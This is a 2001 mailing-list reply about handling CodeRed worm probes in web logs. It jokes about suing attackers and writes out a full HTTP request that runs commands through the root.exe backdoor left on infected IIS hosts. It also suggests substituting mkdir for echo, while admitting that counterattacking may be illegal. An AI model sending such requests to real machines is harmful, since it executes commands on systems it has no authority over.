Hi,
On Mon, 6 Aug 2001, Alejandro González Hernández - Imoq wrote:
> What do all of you do about it? Block the IPs? Call the cops? Cry? Just
> erase excesive long logs? Any other suggestion? :).
Call the cops and sue them for attempting to hack your system. Of
course for a settlement of, say 500k USD for each attempt, you will get
pretty rich. ;) Topic: MAKE MONEY FAST!
> I'll go for the ignore one, I think... as long as my 2 gb /var
> partition doesn't get full ;).
Ohh, you can also inform the people by connecting to their port 80 and
sending some request like the following:
GET /scripts/root.exe?/c%20echo%20Sorry,%20I%20must%20inform%20you%20that%20
your%20computer%20has%20been%20attacked%20by%20CodeRed.%20I%20have%20found%20
you%20because%20you%20were%20in%20the%20logfile%20of%20my%20webserver%20and%20
could%20leave%20this%20message%20for%20you%20by%20using%20a%20further%20
security%20bug%20the%20virus%20left%20behind%20making%20you%20look%20like%20a%20complete%20and%20utter%20moron...
HTTP/1.0
Or substitute the echo command with a mkdir. Although this will probably
result in another format string vulnerability because the drectory is too
long. ;)
Ohh and please keep in mind that every security consultant tells you not
to counter attack cracked systems... It may even be illegal!
bye,
andreas
_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list
